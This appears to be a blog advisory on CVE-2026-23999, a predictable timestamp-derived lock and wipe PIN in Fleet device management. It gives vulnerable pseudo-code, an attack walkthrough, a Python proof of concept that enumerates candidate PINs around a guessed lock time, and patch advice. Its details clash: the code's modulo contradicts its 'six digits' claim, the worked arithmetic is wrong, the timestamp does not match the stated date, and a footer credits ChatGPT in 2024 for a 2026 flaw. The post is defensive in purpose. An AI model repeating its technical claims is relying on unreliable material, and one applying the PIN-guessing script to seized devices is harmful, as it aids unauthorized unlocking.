A newly disclosed vulnerability tracked as CVE-2026-23999 affects Fleet device management, an open-source platform used by organizations to manage laptops and servers at scale. This issue enables an attacker with physical device access to predict the unlock or wipe PIN, under certain conditions. Although exploitation is quite constrained and does not allow remote attacks or system-wide compromise, it’s still notable due to how the flaw was introduced.
This post breaks down how the vulnerability works, includes exclusive code analysis, and discusses what admins need to understand to secure their environment.
Vulnerability Overview
Vulnerable Versions:
Fleet before 4.80.1
Patched version:
4.80.1 release notes
Summary:
Fleet generated 6-digit PINs for device lock and wipe by deriving them from the current Unix timestamp. With just the timestamp, attackers could reverse-engineer possible PINs. If an attacker knows roughly _when_ a device was locked, it's feasible to brute-force the PIN—though physical access and other hurdles remain.
Here’s what the old code (simplified for demonstration) looked like in affected Fleet versions
// Vulnerable pseudo-code for generating a PIN
func generatePin() string {
t := time.Now().Unix() // Current timestamp, seconds resolution (e.g., 1719251403)
pin := fmt.Sprintf("%06d", t % 100000) // Get last 6 digits
return pin // e.g., 251403
}
No secret key, no randomness—just the last 6 digits of the Unix timestamp!
Attacker steals device: Gains access to a locked laptop or phone managed by Fleet.
2. Attacker knows lock time: Maybe the device was lost at a conference, badge out time is known, or logs are accessible.
Attacker guesses the PIN: Tries every possible PIN in a window (±5 minutes = ~600 tries).
4. Operating system rate limits: Most systems allow a handful of guesses before slowing down or wiping data.
5. If luck holds: Within the guess window, the attacker could successfully unlock or delay the wipe.
Exploit Details
If you know the device was locked at approximately 2026-06-24 14:30:03 UTC, Unix timestamp: 1787917803, the generated PIN would be:
1787917803 % 100000 = 917803
Python Proof-of-Concept
Let’s show a Python snippet to predict all possible PINs within a 10-minute window around a guessed lock time:
import time
# The approximate lock time the attacker thinks the device was locked, in Unix timestamp
lock_time_guess = 1787917803 # e.g., 2026-06-24 14:30:03 UTC
# Try all timestamps within +/- 5 minutes (300 seconds)
possible_pins = set()
for offset in range(-300, 301): # 10 min window
pin = str((lock_time_guess + offset) % 1_000_000).zfill(6)
possible_pins.add(pin)
print(f'Predictable PINs: {sorted(possible_pins)}')
print(f'Total candidates: {len(possible_pins)}')
This would generate 601 possible candidate PINs for entry.
## Mitigation/Workarounds
Update Fleet now:
Patch by upgrading to Fleet 4.80.1.
Physical access is required: The intruder needs the locked device in-hand.
- Knowledge of lock time: The more precisely attackers know _when_ the lock command was issued, the more feasible the attack.
- System lockout/wipe: OSes (like Windows, macOS) strictly limit attempts; most devices erase themselves, slowing or defeating brute-force.
Conclusion
CVE-2026-23999 is a clear example of why cryptographically secure random numbers matter, even for seemingly “minor” features like PINs. While practical exploitation is difficult, the root cause is a classic too-simple code pattern.
Admins: Upgrade Fleet as soon as possible. Double-check device loss procedures, and watch audit logs for unusual activity. No need to panic—but don’t delay the fix.
References
- Fleet Security Advisory: CVE-2026-23999
- Fleet 4.80.1 Release Notes
- Fleet Device Management Project
*Exclusive content by ChatGPT, June 2024. For educational purposes only. Always patch your systems!*
Timeline
Published on: 02/26/2026 02:45:48 UTC
Last modified on: 02/27/2026 14:06:59 UTC